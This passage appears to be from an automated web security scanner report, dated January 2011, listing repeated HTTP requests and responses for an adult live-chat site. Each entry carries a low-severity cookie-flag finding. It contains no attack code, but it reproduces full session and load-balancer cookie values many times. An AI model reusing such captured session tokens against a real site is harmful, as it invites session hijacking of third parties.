imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:23 GMT Connection: close Content-Length: 118643 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/lesbian/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:57 GMT Connection: close Content-Length: 32831 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:28 GMT Connection: close Content-Length: 24939 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:54 GMT Connection: close Content-Length: 23142 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:45 GMT Connection: close Content-Length: 48997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 265777 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:46 GMT Connection: close Content-Length: 53291 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:17 GMT Connection: close Content-Length: 29247 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25084 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:26 GMT Connection: close Content-Length: 25422 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:40 GMT Connection: close Content-Length: 31717 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
